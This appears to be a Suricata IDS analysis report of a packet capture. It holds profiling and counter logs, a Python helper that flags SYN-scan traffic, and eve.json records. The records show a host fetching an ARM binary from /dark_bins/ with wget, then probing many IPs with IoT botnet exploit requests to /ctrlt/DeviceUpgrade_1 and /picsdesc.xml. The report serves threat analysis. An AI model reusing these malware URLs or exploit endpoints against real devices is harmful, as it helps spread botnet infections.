Filename: pcap (6).pcap
Status: Analysis complete
IDS: suricata-4.0.0
Ruleset: etpro-all
Runtime: 31.3631281853 seconds
Hash: e50b5b64c5f3331deb0fb67bc7c285a5
Uploaded: 1569237399

Logfiles


packet_stats.log - (11794 bytes)
Packet profile dump:

IP ver   Proto   cnt            min            max            avg            tot           %% 
------   -----   ----------     ------------   ------------   -----------    -----------   ---
 IPv4       1          1062        136285912     7743199852    5851165450       6213.9b    2.22
 IPv4       6         47687          4292412     7752811116    5742432422     273839.4b   97.78
Note: Protocol 256 tracks pseudo/tunnel packets.

Per Thread module stats:

Thread Module              IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
TMM_FLOWWORKER              IPv4       1          1062           114822        3214580        153659        163.2m    1.02
TMM_FLOWWORKER              IPv4       6         47687           113592       31113594        317063         15.1b   94.76
TMM_RECEIVEPCAPFILE         IPv4       1          1062             4422          30086          4699          5.0m    0.03
TMM_RECEIVEPCAPFILE         IPv4       6         47510             4406       19661880          5414        257.3m    1.61
TMM_DECODEPCAPFILE          IPv4       1          1062             4532        5007518         24122         25.6m    0.16
TMM_DECODEPCAPFILE          IPv4       6         47510             4538        5306064          8092        384.5m    2.41

Flow Worker            IP ver   Proto   cnt            min            max            avg            tot           %% 
--------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
flow                    IPv4       1           473             4744          31410          6620          3.1m  0.02  
flow                    IPv4       6         47510             4596       30414694          7288        346.3m  2.47  
stream                  IPv4       6         47687             4574        6718192          6692        319.1m  2.28  
detect                  IPv4       1          1062            96132        3186520        138022        146.6m  1.05  
detect                  IPv4       6         47687            76586       18262786        271624         13.0b  92.54 
tcp-prune               IPv4       6         47687             4420        2132378          4819        229.8m  1.64  
Note: stream includes app-layer for TCP

Per App layer parser stats:

App Layer              IP ver   Proto   cnt            min            max            avg            tot           %% 
--------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
http                    IPv4       6             4             9488          34162         17481         69.9k  100.00
Proto detect            IPv4       6           151             4556         423622         12199          1.8m

Log Thread Module          IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---

Logger/output stats:

Logger                     IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
LOGGER_ALERT_FAST           IPv4       1             1           107098         107098        107098        107.1k  0.31  
LOGGER_ALERT_FAST           IPv4       6             7            74776         156692         93312        653.2k  1.86  
LOGGER_UNIFIED2             IPv4       1             1            47048          47048         47048         47.0k  0.13  
LOGGER_UNIFIED2             IPv4       6             7            46786         151488         70272        491.9k  1.40  
LOGGER_JSON_ALERT           IPv4       1             1           106018         106018        106018        106.0k  0.30  
LOGGER_JSON_ALERT           IPv4       6             7            89410       24899216       3653635         25.6m  72.90 
LOGGER_JSON_HTTP            IPv4       6            42            61016         568996        137931          5.8m  16.51 
LOGGER_JSON_FILE            IPv4       6            42            37756         224470         54936          2.3m  6.58  

Prefilter                        IP ver   Proto   cnt            min            max            avg            tot          %% 
--------------------             ------   -----   ----------     ------------   ------------   -----------    ---------    ---
payload                           IPv4       1          1062             4806         107570         10336        11.0m  13.39 
payload                           IPv4       6           582             4422         408650         51072        29.7m  36.26 
stream                            IPv4       6           582             4432        1039328         29148        17.0m  20.69 
http_uri                          IPv4       6            42            11536         441586         33674         1.4m  1.73  
http_request_line                 IPv4       6            42             7190          36622         13458       565.3k  0.69  
http_client_body                  IPv4       6            42             6266         517740         76488         3.2m  3.92  
http_header (request)             IPv4       6            42            17160         591868         78854         3.3m  4.04  
http_header (request trailer)     IPv4       6            41             4518          26778          9642       395.3k  0.48  
http_header_names (request)       IPv4       6            42            10532          33450         15818       664.4k  0.81  
http_accept (request)             IPv4       6            42             5594          28652         10749       451.5k  0.55  
http_referer (request)            IPv4       6            42             5194          13074          9381       394.0k  0.48  
http_content_len (request)        IPv4       6            42             5578          30130         11171       469.2k  0.57  
http_content_type (request)       IPv4       6            42             5518          28636         10250       430.5k  0.53  
http_protocol (request)           IPv4       6            42             6634          27696         10597       445.1k  0.54  
http_start (request)              IPv4       6            42            12280         434796         29036         1.2m  1.49  
http_raw_header (request)         IPv4       6            42            13070          53868         26474         1.1m  1.36  
http_method                       IPv4       6            42             6746         433398         32421         1.4m  1.66  
http_cookie (request)             IPv4       6            42             5314          14218          9609       403.6k  0.49  
http_raw_uri                      IPv4       6            42             5968          22406         11258       472.9k  0.58  
http_user_agent                   IPv4       6            42             9098          28742         11498       482.9k  0.59  
http_host                         IPv4       6            42             4556          21912          9385       394.2k  0.48  
http_response_line                IPv4       6             3             9396          14384         12471        37.4k  0.05  
http_header (response)            IPv4       6             3            43234          68688         52497       157.5k  0.19  
http_header (response trailer)    IPv4       6             1             5116           5116          5116         5.1k  0.01  
http_content_type (response)      IPv4       6             3             9050          15372         12168        36.5k  0.04  
http_raw_header (response)        IPv4       6            44             6204          22282          7550       332.2k  0.41  
http_cookie (response)            IPv4       6             3             5004           5794          5320        16.0k  0.02  
http_stat_code                    IPv4       6             3             6184           6478          6356        19.1k  0.02  
file_data (http response)         IPv4       6            43             4464        1640670        151280         6.5m  7.94  
Total                             IPv4                  3084                                         26580        82.0m

General detection engine stats:

Detection phase            IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
PROF_DETECT_IPONLY          IPv4       1          1045             5060         132078         20716         21.6m  0.20  
PROF_DETECT_IPONLY          IPv4       6         46211             5078       15985930         48864          2.3b  20.53 
PROF_DETECT_RULES           IPv4       1          1062             4406          57014          7405          7.9m  0.07  
PROF_DETECT_RULES           IPv4       6         47687             4406       15575186        120442          5.7b  52.21 
PROF_DETECT_STATEFUL_START    IPv4       6            78             8910       12678460        363585         28.4m  0.26  
PROF_DETECT_STATEFUL_CONT    IPv4       1          1062             4386        3057786          7834          8.3m  0.08  
PROF_DETECT_STATEFUL_CONT    IPv4       6         47687             4380        7243146          5120        244.2m  2.22  
PROF_DETECT_STATEFUL_UPDATE    IPv4       6           163             4458          18770          4884        796.3k  0.01  
PROF_DETECT_PREFILTER       IPv4       1          1062            31780         135312         39702         42.2m  0.38  
PROF_DETECT_PREFILTER       IPv4       6         47687            13380       13682962         19807        944.6m  8.59  
PROF_DETECT_PF_PAYLOAD      IPv4       1          1062            13728         116444         19796         21.0m  0.19  
PROF_DETECT_PF_PAYLOAD      IPv4       6           582            22198        1170598         94495         55.0m  0.50  
PROF_DETECT_PF_TX           IPv4       6           163             4478       13582422        294244         48.0m  0.44  
PROF_DETECT_PF_SORT1        IPv4       1            13             4512          40518          7814        101.6k  0.00  
PROF_DETECT_PF_SORT1        IPv4       6           333             4444          21976          5811          1.9m  0.02  
PROF_DETECT_PF_SORT2        IPv4       1          1062             4396          36788          4866          5.2m  0.05  
PROF_DETECT_PF_SORT2        IPv4       6         47687             4384        1798990          4901        233.8m  2.13  
PROF_DETECT_NONMPMLIST      IPv4       1          1062             4402         107528          5142          5.5m  0.05  
PROF_DETECT_NONMPMLIST      IPv4       6         47687             4398        7226578          5363        255.8m  2.33  
PROF_DETECT_ALERT           IPv4       1          1062             4406          27202          4726          5.0m  0.05  
PROF_DETECT_ALERT           IPv4       6         47687             4400        4425860          4918        234.5m  2.13  
PROF_DETECT_CLEANUP         IPv4       1          1062             4406          62676          4833          5.1m  0.05  
PROF_DETECT_CLEANUP         IPv4       6         47687             4442       13959912          6215        296.4m  2.69  
PROF_DETECT_GETSGH          IPv4       1          1062             4438          29594          4917          5.2m  0.05  
PROF_DETECT_GETSGH          IPv4       6         47687             4420        6971062         11076        528.2m  4.80  


stats.log - (5518 bytes)
------------------------------------------------------------------------------------
Date: 9/23/2019 -- 11:17:10 (uptime: 0d, 00h 00m 08s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 48577
decoder.bytes                              | Total                     | 3159002
decoder.ipv4                               | Total                     | 48572
decoder.ethernet                           | Total                     | 48577
decoder.tcp                                | Total                     | 47510
decoder.icmpv4                             | Total                     | 1062
decoder.avg_pkt_size                       | Total                     | 65
decoder.max_pkt_size                       | Total                     | 1153
flow.tcp                                   | Total                     | 37544
tcp.sessions                               | Total                     | 37544
tcp.syn                                    | Total                     | 37553
tcp.synack                                 | Total                     | 223
tcp.rst                                    | Total                     | 1265
tcp.overlap                                | Total                     | 113
detect.alert                               | Total                     | 6
detect.nonmpm_list                         | Total                     | 15
detect.fnonmpm_list                        | Total                     | 11
detect.match_list                          | Total                     | 11
app_layer.flow.http                        | Total                     | 1
app_layer.tx.http                          | Total                     | 7
app_layer.flow.failed_tcp                  | Total                     | 23
flow.spare                                 | Total                     | 9991
flow_mgr.flows_checked                     | Total                     | 1
flow_mgr.flows_notimeout                   | Total                     | 1
flow_mgr.rows_checked                      | Total                     | 65536
flow_mgr.rows_skipped                      | Total                     | 65535
flow_mgr.rows_maxlen                       | Total                     | 1
tcp.memuse                                 | Total                     | 12483816
tcp.reassembly_memuse                      | Total                     | 323584
http.memuse                                | Total                     | 712196
flow.memuse                                | Total                     | 17034784
------------------------------------------------------------------------------------
Date: 9/23/2019 -- 11:17:10 (uptime: 0d, 00h 00m 08s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 48577
decoder.bytes                              | Total                     | 3159002
decoder.ipv4                               | Total                     | 48572
decoder.ethernet                           | Total                     | 48577
decoder.tcp                                | Total                     | 47510
decoder.icmpv4                             | Total                     | 1062
decoder.avg_pkt_size                       | Total                     | 65
decoder.max_pkt_size                       | Total                     | 1153
flow.tcp                                   | Total                     | 44585
tcp.sessions                               | Total                     | 44585
tcp.syn                                    | Total                     | 44601
tcp.synack                                 | Total                     | 257
tcp.rst                                    | Total                     | 1508
tcp.overlap                                | Total                     | 147
detect.alert                               | Total                     | 8
detect.nonmpm_list                         | Total                     | 15
detect.fnonmpm_list                        | Total                     | 11
detect.match_list                          | Total                     | 11
app_layer.flow.http                        | Total                     | 3
app_layer.tx.http                          | Total                     | 82
app_layer.flow.failed_tcp                  | Total                     | 30
flow.spare                                 | Total                     | 9991
flow_mgr.flows_checked                     | Total                     | 1
flow_mgr.flows_notimeout                   | Total                     | 1
flow_mgr.rows_checked                      | Total                     | 65536
flow_mgr.rows_skipped                      | Total                     | 65535
flow_mgr.rows_maxlen                       | Total                     | 1
tcp.memuse                                 | Total                     | 573440
tcp.reassembly_memuse                      | Total                     | 81920
flow.memuse                                | Total                     | 17034784
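The counters above already tell the story before any alert is read: 44601 SYNs against 257 SYN-ACKs means well under 1% of the TCP sessions ever completed a handshake, with an average packet size of 65 bytes, which is what a mass SYN scan looks like rather than client traffic. The following parser is an added example written for this page, not part of Suricata or of the analysis service that produced the output; it reads stats.log dumps (the format is cumulative, so the last dump holds the totals) and derives that scan indicator. The sample text is a constructed excerpt of the two dumps shown above, and the thresholds in scan_like are assumptions to tune per environment.

```python
import re

# Constructed sample: two trimmed stats.log dumps copied from the output above.
SAMPLE_STATS = """\
------------------------------------------------------------------------------------
Date: 9/23/2019 -- 11:17:10 (uptime: 0d, 00h 00m 08s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 48577
tcp.syn                                    | Total                     | 37553
tcp.synack                                 | Total                     | 223
------------------------------------------------------------------------------------
Date: 9/23/2019 -- 11:17:10 (uptime: 0d, 00h 00m 08s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 48577
decoder.tcp                                | Total                     | 47510
decoder.avg_pkt_size                       | Total                     | 65
tcp.sessions                               | Total                     | 44585
tcp.syn                                    | Total                     | 44601
tcp.synack                                 | Total                     | 257
tcp.rst                                    | Total                     | 1508
app_layer.flow.http                        | Total                     | 3
app_layer.flow.failed_tcp                  | Total                     | 30
detect.alert                               | Total                     | 8
"""

# One counter row: name | thread-module name | integer value.
# Header, separator and "Date:" lines do not match and are skipped.
ROW = re.compile(r"^(\S+)\s*\|\s*(\S+)\s*\|\s*(\d+)\s*$")


def parse_stats(text):
    """Return a list of dicts, one per dump, keyed by counter name.
    stats.log is cumulative, so the last dump carries the totals."""
    dumps = []
    for line in text.splitlines():
        if line.startswith("Date:"):
            dumps.append({})
            continue
        m = ROW.match(line)
        if m and dumps:
            dumps[-1][m.group(1)] = int(m.group(3))
    return dumps


def scan_indicators(counters, min_syn=1000, max_completion=0.05):
    """Flag scan-like traffic: many SYNs, very few SYN-ACKs.
    min_syn and max_completion are assumed thresholds, not Suricata defaults."""
    syn = counters.get("tcp.syn", 0)
    synack = counters.get("tcp.synack", 0)
    completion = synack / syn if syn else 0.0
    return {
        "syn": syn,
        "synack": synack,
        "rst": counters.get("tcp.rst", 0),
        "handshake_completion": completion,
        "avg_pkt_size": counters.get("decoder.avg_pkt_size"),
        "http_flows": counters.get("app_layer.flow.http", 0),
        "scan_like": syn >= min_syn and completion < max_completion,
    }


if __name__ == "__main__":
    latest = parse_stats(SAMPLE_STATS)[-1]
    for key, value in scan_indicators(latest).items():
        print(f"{key:22} {value}")
```

Run it against a real stats.log by replacing SAMPLE_STATS with the file contents; only the last dump matters for the verdict, the earlier ones are useful for seeing the counters grow while the capture is replayed.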


eve.json - (43672 bytes)
{"timestamp":"2019-09-19T08:07:12.685917+0000","flow_id":855884828794989,"pcap_cnt":21,"event_type":"alert","src_ip":"192.168.122.105","src_port":53098,"dest_ip":"192.236.178.80","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2025125,"rev":1,"signature":"ET INFO ARM7 File Download Request from IP Address","category":"Potentially Bad Traffic","severity":2},"app_proto":"http"}
{"timestamp":"2019-09-19T08:07:12.781794+0000","flow_id":855884828794989,"pcap_cnt":59,"event_type":"alert","src_ip":"192.236.178.80","src_port":80,"dest_ip":"192.168.122.105","dest_port":53098,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2019240,"rev":14,"signature":"ET POLICY Executable and linking format (ELF) file download Over HTTP","category":"Potential Corporate Privacy Violation","severity":1},"app_proto":"http"}
{"timestamp":"2019-09-19T08:07:12.804318+0000","flow_id":855884828794989,"pcap_cnt":84,"event_type":"http","src_ip":"192.168.122.105","src_port":53098,"dest_ip":"192.236.178.80","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"192.236.178.80","url":"\/dark_bins\/dark.arm7","http_user_agent":"Wget\/1.19.4 (linux-gnueabihf)","http_content_type":"text\/plain"}}
{"timestamp":"2019-09-19T08:07:12.835888+0000","flow_id":855884828794989,"pcap_cnt":85,"event_type":"fileinfo","src_ip":"192.236.178.80","src_port":80,"dest_ip":"192.168.122.105","dest_port":53098,"proto":"TCP","http":{"hostname":"192.236.178.80","url":"\/dark_bins\/dark.arm7","http_user_agent":"Wget\/1.19.4 (linux-gnueabihf)","http_content_type":"text\/plain","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":54888},"app_proto":"http","fileinfo":{"filename":"\/dark_bins\/dark.arm7","gaps":false,"state":"CLOSED","stored":false,"size":54888,"tx_id":0}}
{"timestamp":"2019-09-19T08:07:13.416654+0000","flow_id":969731527009741,"pcap_cnt":1320,"event_type":"alert","src_ip":"5.157.42.154","src_port":52869,"dest_ip":"192.168.122.105","dest_port":53291,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2400000,"rev":2652,"signature":"ET DROP Spamhaus DROP Listed Traffic Inbound group 1","category":"Misc Attack","severity":2}}
{"timestamp":"2019-09-19T08:07:23.820889+0000","flow_id":1825130099201547,"pcap_cnt":7878,"event_type":"http","src_ip":"192.168.122.105","src_port":49346,"dest_ip":"197.246.34.89","dest_port":37215,"proto":"TCP","tx_id":0,"http":{"url":"\/ctrlt\/DeviceUpgrade_1"}}
{"timestamp":"2019-09-19T08:07:23.820889+0000","flow_id":1825130099201547,"pcap_cnt":7878,"event_type":"http","src_ip":"192.168.122.105","src_port":49346,"dest_ip":"197.246.34.89","dest_port":37215,"proto":"TCP","tx_id":1,"http":{"url":"HUAWEIUPNP)<\/NewDownloadURL><\/u:Upgrade><\/s:Body><\/s:Envelope>"}}
{"timestamp":"2019-09-19T08:07:23.820889+0000","flow_id":1825130099201547,"pcap_cnt":7878,"event_type":"fileinfo","src_ip":"192.168.122.105","src_port":49346,"dest_ip":"197.246.34.89","dest_port":37215,"proto":"TCP","http":{"url":"\/ctrlt\/DeviceUpgrade_1","http_method":"POST","protocol":"HTTP\/1.1","length":0},"app_proto":"http","fileinfo":{"filename":"\/ctrlt\/DeviceUpgrade_1","gaps":false,"state":"CLOSED","stored":false,"size":430,"tx_id":0}}
{"timestamp":"2019-09-19T08:07:23.994926+0000","flow_id":1055789787374910,"pcap_cnt":7912,"event_type":"http","src_ip":"192.168.122.105","src_port":39650,"dest_ip":"197.246.202.89","dest_port":37215,"proto":"TCP","tx_id":0,"http":{"url":"\/ctrlt\/DeviceUpgrade_1"}}
{"timestamp":"2019-09-19T08:07:23.994926+0000","flow_id":1055789787374910,"pcap_cnt":7912,"event_type":"http","src_ip":"192.168.122.105","src_port":39650,"dest_ip":"197.246.202.89","dest_port":37215,"proto":"TCP","tx_id":1,"http":{"url":"HUAWEIUPNP)<\/NewDownloadURL><\/u:Upgrade><\/s:Body><\/s:Envelope>"}}
{"timestamp":"2019-09-19T08:07:23.994926+0000","flow_id":1055789787374910,"pcap_cnt":7912,"event_type":"fileinfo","src_ip":"192.168.122.105","src_port":39650,"dest_ip":"197.246.202.89","dest_port":37215,"proto":"TCP","http":{"url":"\/ctrlt\/DeviceUpgrade_1","http_method":"POST","protocol":"HTTP\/1.1","length":0},"app_proto":"http","fileinfo":{"filename":"\/ctrlt\/DeviceUpgrade_1","gaps":false,"state":"CLOSED","stored":false,"size":430,"tx_id":0}}
{"timestamp":"2019-09-19T08:07:38.336714+0000","flow_id":313363889028149,"pcap_cnt":18364,"event_type":"alert","src_ip":"161.0.7.66","src_port":52869,"dest_ip":"192.168.122.105","dest_port":53291,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2400012,"rev":2652,"signature":"ET DROP Spamhaus DROP Listed Traffic Inbound group 13","category":"Misc Attack","severity":2}}
{"timestamp":"2019-09-19T08:07:45.920773+0000","flow_id":194099090107508,"pcap_cnt":24003,"event_type":"fileinfo","src_ip":"192.168.122.105","src_port":59454,"dest_ip":"60.184.170.69","dest_port":52869,"proto":"TCP","http":{"url":"\/picsdesc.xml","http_user_agent":"Hello-World","http_method":"POST","protocol":"HTTP\/1.1","length":0},"app_proto":"http","fileinfo":{"filename":"\/picsdesc.xml","gaps":false,"state":"CLOSED","stored":false,"size":630,"tx_id":0}}
{"timestamp":"2019-09-19T08:07:52.717056+0000","flow_id":142651824822169,"pcap_cnt":28528,"event_type":"alert","src_ip":"181.177.97.189","src_port":52869,"dest_ip":"192.168.122.105","dest_port":53291,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2400015,"rev":2652,"signature":"ET DROP Spamhaus DROP Listed Traffic Inbound group 16","category":"Misc Attack","severity":2}}
{"timestamp":"2019-09-19T08:08:05.373812+0000","flow_id":1043604967876021,"pcap_cnt":36831,"event_type":"alert","src_ip":"160.124.224.70","dest_ip":"192.168.122.105","proto":"ICMP","icmp_type":3,"icmp_code":10,"alert":{"action":"allowed","gid":1,"signature_id":2400012,"rev":2652,"signature":"ET DROP Spamhaus DROP Listed Traffic Inbound group 13","category":"Misc Attack","severity":2}}
{"timestamp":"2019-09-19T08:08:14.165663+0000","flow_id":337140830330017,"pcap_cnt":44149,"event_type":"alert","src_ip":"107.182.246.15","src_port":52869,"dest_ip":"192.168.122.105","dest_port":53291,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2400005,"rev":2652,"signature":"ET DROP Spamhaus DROP Listed Traffic Inbound group 6","category":"Misc Attack","severity":2}}
{"timestamp":"2019-09-19T08:08:18.021446+0000","flow_id":1087529599189631,"pcap_cnt":47387,"event_type":"alert","src_ip":"160.124.82.153","src_port":52869,"dest_ip":"192.168.122.105","dest_port":53291,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2400012,"rev":2652,"signature":"ET DROP Spamhaus DROP Listed Traffic Inbound group 13","category":"Misc Attack","severity":2}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1127298848529354,"event_type":"http","src_ip":"192.168.122.105","src_port":41374,"dest_ip":"156.238.44.17","dest_port":37215,"proto":"TCP","tx_id":0,"http":{"url":"\/ctrlt\/DeviceUpgrade_1"}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1127298848529354,"event_type":"http","src_ip":"192.168.122.105","src_port":41374,"dest_ip":"156.238.44.17","dest_port":37215,"proto":"TCP","tx_id":1,"http":{"url":"HUAWEIUPNP)<\/NewDownloadURL><\/u:Upgrade><\/s:Body><\/s:Envelope>"}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1127298848529354,"event_type":"fileinfo","src_ip":"192.168.122.105","src_port":41374,"dest_ip":"156.238.44.17","dest_port":37215,"proto":"TCP","http":{"url":"\/ctrlt\/DeviceUpgrade_1","http_method":"POST","protocol":"HTTP\/1.1","length":0},"app_proto":"http","fileinfo":{"filename":"\/ctrlt\/DeviceUpgrade_1","gaps":false,"state":"CLOSED","stored":false,"size":430,"tx_id":0}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1973078840453593,"event_type":"http","src_ip":"192.168.122.105","src_port":37808,"dest_ip":"156.238.62.190","dest_port":37215,"proto":"TCP","tx_id":0,"http":{"url":"\/ctrlt\/DeviceUpgrade_1"}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1973078840453593,"event_type":"http","src_ip":"192.168.122.105","src_port":37808,"dest_ip":"156.238.62.190","dest_port":37215,"proto":"TCP","tx_id":1,"http":{"url":"HUAWEIUPNP)<\/NewDownloadURL><\/u:Upgrade><\/s:Body><\/s:Envelope>"}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1973078840453593,"event_type":"fileinfo","src_ip":"192.168.122.105","src_port":37808,"dest_ip":"156.238.62.190","dest_port":37215,"proto":"TCP","http":{"url":"\/ctrlt\/DeviceUpgrade_1","http_method":"POST","protocol":"HTTP\/1.1","length":0},"app_proto":"http","fileinfo":{"filename":"\/ctrlt\/DeviceUpgrade_1","gaps":false,"state":"CLOSED","stored":false,"size":430,"tx_id":0}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1002347510443363,"event_type":"http","src_ip":"192.168.122.105","src_port":39890,"dest_ip":"197.234.46.162","dest_port":52869,"proto":"TCP","tx_id":0,"http":{"url":"\/picsdesc.xml","http_user_agent":"Hello-World"}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1002347510443363,"event_type":"http","src_ip":"192.168.122.105","src_port":39890,"dest_ip":"197.234.46.162","dest_port":52869,"proto":"TCP","tx_id":1,"http":{}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1002347510443363,"event_type":"fileinfo","src_ip":"192.168.122.105","src_port":39890,"dest_ip":"197.234.46.162","dest_port":52869,"proto":"TCP","http":{"url":"\/picsdesc.xml","http_user_agent":"Hello-World","http_method":"POST","protocol":"HTTP\/1.1","length":0},"app_proto":"http","fileinfo":{"filename":"\/picsdesc.xml","gaps":false,"state":"CLOSED","stored":false,"size":630,"tx_id":0}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1992805625803464,"event_type":"http","src_ip":"192.168.122.105","src_port":55670,"dest_ip":"103.37.249.11","dest_port":52869,"proto":"TCP","tx_id":0,"http":{"url":"\/picsdesc.xml","http_user_agent":"Hello-World"}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1992805625803464,"event_type":"http","src_ip":"192.168.122.105","src_port":55670,"dest_ip":"103.37.249.11","dest_port":52869,"proto":"TCP","tx_id":1,"http":{}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1992805625803464,"event_type":"fileinfo","src_ip":"192.168.122.105","src_port":55670,"dest_ip":"103.37.249.11","dest_port":52869,"proto":"TCP","http":{"url":"\/picsdesc.xml","http_user_agent":"Hello-World","http_method":"POST","protocol":"HTTP\/1.1","length":0},"app_proto":"http","fileinfo":{"filename":"\/picsdesc.xml","gaps":false,"state":"CLOSED","stored":false,"size":630,"tx_id":0}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1571482218889850,"event_type":"http","src_ip":"192.168.122.105","src_port":48248,"dest_ip":"156.226.77.103","dest_port":37215,"proto":"TCP","tx_id":0,"http":{"url":"\/ctrlt\/DeviceUpgrade_1"}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1571482218889850,"event_type":"http","src_ip":"192.168.122.105","src_port":48248,"dest_ip":"156.226.77.103","dest_port":37215,"proto":"TCP","tx_id":1,"http":{"url":"HUAWEIUPNP)<\/NewDownloadURL><\/u:Upgrade><\/s:Body><\/s:Envelope>"}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1571482218889850,"event_type":"fileinfo","src_ip":"192.168.122.105","src_port":48248,"dest_ip":"156.226.77.103","dest_port":37215,"proto":"TCP","http":{"url":"\/ctrlt\/DeviceUpgrade_1","http_method":"POST","protocol":"HTTP\/1.1","length":0},"app_proto":"http","fileinfo":{"filename":"\/ctrlt\/DeviceUpgrade_1","gaps":false,"state":"CLOSED","stored":false,"size":430,"tx_id":0}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":305057421013190,"event_type":"http","src_ip":"192.168.122.105","src_port":48638,"dest_ip":"156.224.3.224","dest_port":37215,"proto":"TCP","tx_id":0,"http":{"url":"\/ctrlt\/DeviceUpgrade_1"}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":305057421013190,"event_type":"http","src_ip":"192.168.122.105","src_port":48638,"dest_ip":"156.224.3.224","dest_port":37215,"proto":"TCP","tx_id":1,"http":{"url":"HUAWEIUPNP)<\/NewDownloadURL><\/u:Upgrade><\/s:Body><\/s:Envelope>"}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":305057421013190,"event_type":"fileinfo","src_ip":"192.168.122.105","src_port":48638,"dest_ip":"156.224.3.224","dest_port":37215,"proto":"TCP","http":{"url":"\/ctrlt\/DeviceUpgrade_1","http_method":"POST","protocol":"HTTP\/1.1","length":0},"app_proto":"http","fileinfo":{"filename":"\/ctrlt\/DeviceUpgrade_1","gaps":false,"state":"CLOSED","stored":false,"size":430,"tx_id":0}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":307786875136975,"event_type":"http","src_ip":"192.168.122.105","src_port":52332,"dest_ip":"156.224.225.80","dest_port":37215,"proto":"TCP","tx_id":0,"http":{"url":"\/ctrlt\/DeviceUpgrade_1"}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":307786875136975,"event_type":"http","src_ip":"192.168.122.105","src_port":52332,"dest_ip":"156.224.225.80","dest_port":37215,"proto":"TCP","tx_id":1,"http":{"url":"HUAWEIUPNP)<\/NewDownloadURL><\/u:Upgrade><\/s:Body><\/s:Envelope>"}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":307786875136975,"event_type":"fileinfo","src_ip":"192.168.122.105","src_port":52332,"dest_ip":"156.224.225.80","dest_port":37215,"proto":"TCP","http":{"url":"\/ctrlt\/DeviceUpgrade_1","http_method":"POST","protocol":"HTTP\/1.1","length":0},"app_proto":"http","fileinfo":{"filename":"\/ctrlt\/DeviceUpgrade_1","gaps":false,"state":"CLOSED","stored":false,"size":430,"tx_id":0}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":873545735915503,"event_type":"http","src_ip":"192.168.122.105","src_port":41304,"dest_ip":"156.224.144.211","dest_port":37215,"proto":"TCP","tx_id":0,"http":{"url":"\/ctrlt\/DeviceUpgrade_1"}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":873545735915503,"event_type":"http","src_ip":"192.168.122.105","src_port":41304,"dest_ip":"156.224.144.211","dest_port":37215,"proto":"TCP","tx_id":1,"http":{"url":"HUAWEIUPNP)<\/NewDownloadURL><\/u:Upgrade><\/s:Body><\/s:Envelope>"}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":873545735915503,"event_type":"fileinfo","src_ip":"192.168.122.105","src_port":41304,"dest_ip":"156.224.144.211","dest_port":37215,"proto":"TCP","http":{"url":"\/ctrlt\/DeviceUpgrade_1","http_method":"POST","protocol":"HTTP\/1.1","length":0},"app_proto":"http","fileinfo":{"filename":"\/ctrlt\/DeviceUpgrade_1","gaps":false,"state":"CLOSED","stored":false,"size":430,"tx_id":0}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1018522357801610,"event_type":"http","src_ip":"192.168.122.105","src_port":57628,"dest_ip":"156.227.240.156","dest_port":37215,"proto":"TCP","tx_id":0,"http":{"url":"\/ctrlt\/DeviceUpgrade_1"}}
{"timestamp":"2019-09-19T08:08:20.755667+0000","flow_id":1018522357801610,"event_type":"http","src_ip":"192.168.122.105","src_port":57628,"dest_ip":"156.227.240.156","dest_port":37215,"proto":"TCP","tx_id":1,"http":{"url":"HUAWEIUPNP)<\/NewDownloadURL><\/u:Upgrade><\/s:Body><\/s:Envelope>"}}
